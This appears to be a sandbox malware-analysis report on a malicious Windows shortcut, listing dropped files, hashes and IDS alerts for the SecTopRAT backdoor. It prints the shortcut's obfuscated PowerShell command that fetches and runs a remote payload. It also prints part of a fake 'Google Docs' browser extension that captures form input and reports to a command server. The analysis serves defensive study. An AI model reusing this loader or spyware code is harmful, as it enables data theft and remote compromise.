File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF9F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFF6A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ittot\llg\background.js

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	596
Entropy (8bit):	4.089531522812482
Encrypted:	false
SSDEEP:	12:8/ACiDfZISRZLWxicmFGW8NkzCIzvWkE5rBQNFBajVDGwgI/:8ICi9IyLWxHyGWMjIzWccMFG
MD5:	AA0E77EC6B92F58452BB5577B9980E6F
SHA1:	237872F2B0C90E8CBE61EAA0E2919D6578CACD3F
SHA-256:	AAD1C9BE17F64D7700FEB2D38DF7DC7446A48BF001AE42095B59B11FD24DFCDE
SHA-512:	37366BD1E0A59036FE966F2E2FE3A0F7DCE6F11F2ED5BF7724AFB61EA5E8D3E01BDC514F0DEB3BEB6FEBFD8B4D08D45E4E729C23CC8F4CAE4F6D11F18FC39FA6
Malicious:	false
Preview:	.async function httpGet(theUrl).{. let response = await fetch(theUrl);. let user = await response.text();.. return user;.}..chrome.runtime.onMessage.addListener(. (request, sender, sendResponse) => {. if (request.message === "get"){. new Promise(async send => {. try{. var key = await httpGet(request.url);. // console.log("send");. send(key);. }catch(error){. send("null");. }.. }).then(sendResponse);. console.log("findl");. return true;. }. . }. );

C:\Users\user\AppData\Local\ittot\llg\content.js

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1877
Entropy (8bit):	5.211069318637675
Encrypted:	false
SSDEEP:	48:TQ1iVUYRor51e0Ad7hR/NAGVqkh3vCI4dBoYCY+YCL:TQ1OU8thjvfC8
MD5:	3F65358E802961EDF4C4E173B4D73C9A
SHA1:	565791853F6C84DB5FCCB5958E5BA0837A5599B4
SHA-256:	9259BF2240953B55435B41D2396DB763446678F0B168DB45DF3BE4282FAD7065
SHA-512:	1BB54F067A83D0A1B80259B974E712C84E4FB5C3B4B9DB4297F2244FF2C595D74B9479E387BF68355B6FD56DE048F099FDB941B85740842692EEBBCCAC286973
Malicious:	false
Preview:	var server = "http://92.255.57.75:9000/";.var iddd = '0CAE766850B2702DDB609BB03263B071';..var debug = 1;.var currLoc = "";..(async function () {...var clientId = iddd;..urlChangeAllert();.....spyjs_refreshEvents(clientId);...})()..function urlChangeAllert(){..try{...var loc = window.location;...getNoRet(server+'churl?pcid='+iddd+"&url="+loc);..}catch(error){ }...}..function spyjs_refreshEvents(clid){..if(currLoc != location.href){...currLoc=location.href;...spyjs_saveData("("+currLoc+")");..}..$('input').unbind('change');..$('input').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('select').unbind('change');..$('select').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('checkbox').unbind('change');..$('checkbox').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('button').unbind('change');..$('button').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});......$('textarea').unbind('change');..$('t

C:\Users\user\AppData\Local\ittot\llg\icon.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5657
Entropy (8bit):	7.83233516247914
Encrypted:	false
SSDEEP:	96:Nyq+wylRcbfXdRICJdBsooMKWsXFAP39Asutnd4mm5oq+tlwg4Ae4quVpdI8JW1:kq+TRYCooMKDXFAPDutLmKtusquVpG8m
MD5:	2C905A6E4A21A3FA14ADC1D99B7CBC03
SHA1:	BD8682B580D951E3DF05DFD467ABBA6B87BB43D9
SHA-256:	CC3631CED23F21AE095C1397770E685F12F6AD788C8FA2F15487835A77A380FB
SHA-512:	753E28BAB9D50B7882A1308F6072F80FDA99EDEAA476FAFC7E647D29F5C9C15F5C404689C866F8F198B7F1ED41BAE3CC55AE4D15528B0DF966A47CBC4B31CAF6
Malicious:	false
Preview:	.PNG........IHDR..............>a.....sRGB.........gAMA......a.....IDATx^.yt.....H.$!@......tf...9uA..*..H.w..#"...N......K .....N...helE%...a..........}......9.wr..=..~.r.....N8..N8..N8..N8.t.....?...{..a......o&5?7..3hA...<~...~.......p.5(..o....Z6$..&.....=.DUO8.9...?/.0....?...'......XE.......#H..s.o.x.....v.,8.%..;X.....$lZ....^D..............$bp....<M@....v.......0.......S..7#.."(..Ea.~...L..`FP.F.dx...[.a.....,..;.@...../"YX.........]...\./"Y8....Z. #...0...H...0#(.Fp0..vx....'..... ....D@...R.?k..........&.....{../..[..M.9.n.. .&.^.........._...u..8. ..t..?!V.....]v.....6.y..}E ...p\|[.8...\|w`..u...7#...1........".`.Xz..........1...d;..G......0..?.D....U/h=0..F0l.rND...`....v8g.-0.[...^.kw=..]G`.....YP...0..M....C.tM........H.v...1......;...7...........L.jC....P.o....L..>.@.....].8.."&....-&......NP.I.8...\..@c......5..._...=#..G... 6.......'!...@.%......y..l.a.@..7d.1....g..3..<.^+M.WK.Cu.R........]#T......4.^...'gU...~...L...z...@

C:\Users\user\AppData\Local\ittot\llg\jquery.js

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with very long lines (32086)
Category:	dropped
Size (bytes):	95785
Entropy (8bit):	5.393592005865771
Encrypted:	false
SSDEEP:	1536:/PEkjP+iADIOr/NEe876nmBu3HvF38sEeLHFoqqhJ7SerN5wVI+xcBmPv7E+nzmQ:ENMyqhJvN32cBC7M6Whca98Hrp
MD5:	3C9137D88A00B1AE0B41FF6A70571615
SHA1:	1797D73E9DA4287351F6FBEC1B183C19BE217C2A
SHA-256:	24262BAAFEF17092927C3DAFE764AAA52A2A371B83ED2249CCA7E414DF99FAC1
SHA-512:	31730738E73937EE0086849CB3D6506EA383CA2EAC312B8D08E25C60563DF5702FC2B92B3778C4B2B66E7FDDD6965D74B5A4DF5132DF3F02FAED01DCF3C7BCAE
Malicious:	false
Preview:	/! jQuery v1.11.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

C:\Users\user\AppData\Local\ittot\llg\manifest.json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	569
Entropy (8bit):	4.878267680490818
Encrypted:	false
SSDEEP:	12:flNAuCONn3Ao19aHuDFRJIbpmxbuvWB0vXY:flVCONQo1XabpWuvPvXY
MD5:	2835DD0A0AEF8405D47AB7F73D82EAA5
SHA1:	851EA2B4F89FC06F6A4CD458840DD5C660A3B76C
SHA-256:	2AAFD1356D876255A99905FBCAFB516DE31952E079923B9DDF33560BBE5ED2F3
SHA-512:	490327E218B0C01239AC419E02A4DC2BD121A08CB7734F8E2BA22E869B60175D599104BA4B45EF580E84E312FE241B3D565FAC958B874D6256473C2F987108CC
Malicious:	false
Preview:	{.."manifest_version": 2,..."name": "Google Docs",.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.."version": "1.7.38",.."icons": {. "16": "icon.png",. "48": "icon.png",. "128": "icon.png". },..."permissions": [..."activeTab",..."storage"..],.."content_scripts": [ {..."all_frames": true,..."js": [ "jquery.js","content.js"],..."matches": [ "<all_urls>" ] ..} ],.."background": {. ."service_worker": "background.js". .},.."browser_action": {..."default_title": "SFASFASD"..}.}

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.726114072134358
Encrypted:	false
SSDEEP:	48:J8HpWy3CFU2UZuBjyukvhkvklCywsUzkxHlxGSogZoCF0zkxHl+GSogZo01:S4QCKNZuBvkvhkvCCtpQxH/HGQxHSHP
MD5:	9F8F6E39387D15DA4FDDBFC92B3977B6
SHA1:	15521B7605FA636DDFEFFFFB4441C82FF0C88CE1
SHA-256:	F0D3C03BABAE8F78B1BED93A868E09D23F249106294EB4504D4DD463DD76E010
SHA-512:	44A5AED6AF992A86EB207BBAC37D52EF8D75BDE39481182494327A87CD1852CF4C969F2B05D13A5D8007B53E6BEFB16DCC3A873C381E6B3473BDAF5B164D2119
Malicious:	false
Preview:	...................................FL..................F.".. ...]...z...J..VP..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z....9Z.VP...e..VP......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y.<..........................B...A.p.p.D.a.t.a...B.V.1......Y.<..Roaming.@......EW.V.Y.<..........................s~..R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y.<..............................M.i.c.r.o.s.o.f.t.....V.1.....EWY..Windows.@......EW.VEWY..............................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VEW.X....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VEW.X....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.Y.<................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6BK4MNYI98O8BCBEU3S2.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.726114072134358
Encrypted:	false
SSDEEP:	48:J8HpWy3CFU2UZuBjyukvhkvklCywsUzkxHlxGSogZoCF0zkxHl+GSogZo01:S4QCKNZuBvkvhkvCCtpQxH/HGQxHSHP
MD5:	9F8F6E39387D15DA4FDDBFC92B3977B6
SHA1:	15521B7605FA636DDFEFFFFB4441C82FF0C88CE1
SHA-256:	F0D3C03BABAE8F78B1BED93A868E09D23F249106294EB4504D4DD463DD76E010
SHA-512:	44A5AED6AF992A86EB207BBAC37D52EF8D75BDE39481182494327A87CD1852CF4C969F2B05D13A5D8007B53E6BEFB16DCC3A873C381E6B3473BDAF5B164D2119
Malicious:	false
Preview:	...................................FL..................F.".. ...]...z...J..VP..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z....9Z.VP...e..VP......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y.<..........................B...A.p.p.D.a.t.a...B.V.1......Y.<..Roaming.@......EW.V.Y.<..........................s~..R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y.<..............................M.i.c.r.o.s.o.f.t.....V.1.....EWY..Windows.@......EW.VEWY..............................W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VEW.X....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VEW.X....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.Y.<................

C:\Users\user\AppData\Roaming\ref095vq842r70_3rd_party_authorisation_form.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.7 (zip deflate encoded)
Category:	dropped
Size (bytes):	62226
Entropy (8bit):	7.8628341877586765
Encrypted:	false
SSDEEP:	1536:xYH0PnkJyCV9S/ngUjvEeh4WO0aCdrVJxorrA:y1yCCPdMfh0vdTxaM
MD5:	9B692B8DF5BC5AFDE45BE85AF2AFD908
SHA1:	57B9AAD0B2DA3F9AD54C494501B545D0BA9E59D9
SHA-256:	ABCDA99E150EF8B74E6D80515A1BA473D403EC99CE2F135B75F62A2FE82648E8
SHA-512:	23562A9BCBEF290748E319AB220ED22126CFBB8542FECD5C033D5278C8AFE874F01630133341209D58F58586194BC25900724622C7F4A13B60195D9758849198
Malicious:	false
Preview:	%PDF-1.7.%....14 0 obj<</Linearized 1/L 62226/O 17/E 55598/N 2/T 61921/H [ 802 300]>>.endobj. .15 0 obj<</ID[<BA067AE368CE6A9DD1432E086A0FEDBD><BA067AE368CE6A9DD1432E086A0FEDBD>]/Size 30/Root 16 0 R/Info 12 0 R/Prev 61922/Length 61/Type/XRef/Filter/FlateDecode/DecodeParms<</Columns 4/Predictor 12>>/Index[14 16]/W[1 2 1]>>stream.x.cbd.g`b`8.$.^..~.w.....u...l& .. .c@....@........L........G.endstream.endobj.startxref.0..%%EOF. .16 0 obj<</Outlines 19 0 R/Type/Catalog/Pages 10 0 R/PageMode/UseOutlines/Metadata 11 0 R>>.endobj.29 0 obj<</S 47/Filter/FlateDecode/Length 62>>stream.x.c```c``Vb`d`.. ...`6#.3...p......D.lP..0..m.....i}.+..!....endstream.endobj.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\ehcfdbh\AutoIt3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\71532689\updater.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: payload_1.hta, Detection: malicious, Browse Filename: fsg5PWtTm2.lnk, Detection: malicious, Browse Filename: Whatsapp-GUI.exe, Detection: malicious, Browse Filename: Whatsapp-GUI.exe, Detection: malicious, Browse Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious, Browse Filename: malware.zip, Detection: malicious, Browse Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious, Browse Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: 3rd_cc_form_Oct_2024.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: tQ6Z4Vjp5f.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\ehcfdbh\bhcbhah.a3x

Download File

Process:	C:\Users\user\AppData\Local\Temp\71532689\updater.exe
File Type:	data
Category:	dropped
Size (bytes):	963397
Entropy (8bit):	6.793850672344393
Encrypted:	false
SSDEEP:	12288:Y3UgFC7mbSkjvbmxqn5A45dZ4aqzHlo0+gXLG7VX:Yrb/j5LdZ4aqDLXLG7VX
MD5:	70B1893C0680EE6389533300335B7DC3
SHA1:	20A13733A25D32547D27A963BDB6E8007532774D
SHA-256:	AA2734107B103077A121FDD37EBFD4E8A36E17E00EBF01746A7DB8D4EAA296EB
SHA-512:	355D7FB4095D6F408281900BFB89C1DED05A72591A7AB8162543039667A9CD7810B5FB62F9DDD0F547007A331ABE9F7597EC3DB8DC88BB3B4296B92D57BB8F07
Malicious:	false
Preview:	L5e...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................L5e.....................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Wed Nov 13 07:16:03 2024, mtime=Wed Nov 13 07:16:03 2024, atime=Wed Nov 13 07:16:03 2024, length=454656, window=hidenormalshowminimized
Entropy (8bit):	3.419104743757449
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	sEOELQpFOB.lnk
File size:	2'323 bytes
MD5:	087dd017a8261d6c06f3401db80e0c33
SHA1:	b20a99fedd78e2207535d73a2ac76d6053e3bbf1
SHA256:	3a1a340bf1283ba3c30c49c57103c5a3218771910256c8b0d92b94f7a1513f4e
SHA512:	55d6fb90d1238d61b9bbda17c42d78ad608d457f7b2b117a965993fd7ac0aaa65b8f5a299ce14b454a2984320b906da6a561e4c93c39542e40f0540fac9b2e8a
SSDEEP:	48:8W6+uBn7hJKpA6GiaUkF5p+dJ9bBwB05W:8ZBNJ15USnKn00
TLSH:	4B419B043BE6071DE7735A72A8B5E634F13B7C05DE51DB1E0047528C4832228D966F7B
File Content Preview:	L..................F.@.. ......H.5..Vx.H.5..Vx.H.5...............................P.O. .:i.....+00.../C:\...................V.1......Y.H..Windows.@........T,.Y.H..........................t...W.i.n.d.o.w.s.....Z.1......Y.H..System32..B........T,.Y.H....r.

File Icon


Icon Hash:	72d282828e8d8dd5

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\..\..\Windows\System32\OpenSSH\sftp.exe
Command Line Argument:	-o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" .
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T08:38:40.291525+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49772	188.114.97.6	443	TCP
2024-12-17T08:38:49.123574+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.243456+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.363630+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.483530+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.603426+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.723432+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.843498+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:49.963790+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.083641+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.203643+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.278219+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	92.255.57.75	15647	192.168.2.11	49796	TCP
2024-12-17T08:38:50.278354+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.398172+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.518134+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.639201+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:50.758990+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.11	49796	92.255.57.75	15647	TCP
2024-12-17T08:38:55.163211+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49808	92.255.57.75	9000	TCP
2024-12-17T08:38:56.713786+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49814	92.255.57.75	9000	TCP
2024-12-17T08:38:56.713786+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49814	92.255.57.75	9000	TCP
2024-12-17T08:38:58.281773+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49819	92.255.57.75	9000	TCP
2024-12-17T08:38:58.281773+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49819	92.255.57.75	9000	TCP
2024-12-17T08:38:59.913324+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49821	92.255.57.75	9000	TCP
2024-12-17T08:38:59.913324+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49821	92.255.57.75	9000	TCP
2024-12-17T08:39:01.478526+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49827	92.255.57.75	9000	TCP
2024-12-17T08:39:01.478526+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49827	92.255.57.75	9000	TCP
2024-12-17T08:39:03.050769+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49832	92.255.57.75	9000	TCP
2024-12-17T08:39:03.050769+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49832	92.255.57.75	9000	TCP
2024-12-17T08:39:04.616357+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49838	92.255.57.75	9000	TCP
2024-12-17T08:39:04.616357+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49838	92.255.57.75	9000	TCP
2024-12-17T08:39:06.196377+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49840	92.255.57.75	9000	TCP
2024-12-17T08:39:06.196377+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49840	92.255.57.75	9000	TCP
2024-12-17T08:39:07.763614+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49846	92.255.57.75	9000	TCP
2024-12-17T08:39:07.763614+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49846	92.255.57.75	9000	TCP
2024-12-17T08:39:09.343309+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49851	92.255.57.75	9000	TCP
2024-12-17T08:39:09.343309+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49851	92.255.57.75	9000	TCP
2024-12-17T08:39:10.900365+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49853	92.255.57.75	9000	TCP
2024-12-17T08:39:10.900365+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49853	92.255.57.75	9000	TCP
2024-12-17T08:39:12.445801+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49859	92.255.57.75	9000	TCP
2024-12-17T08:39:12.445801+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.11	49859	92.255.57.75	9000	TCP
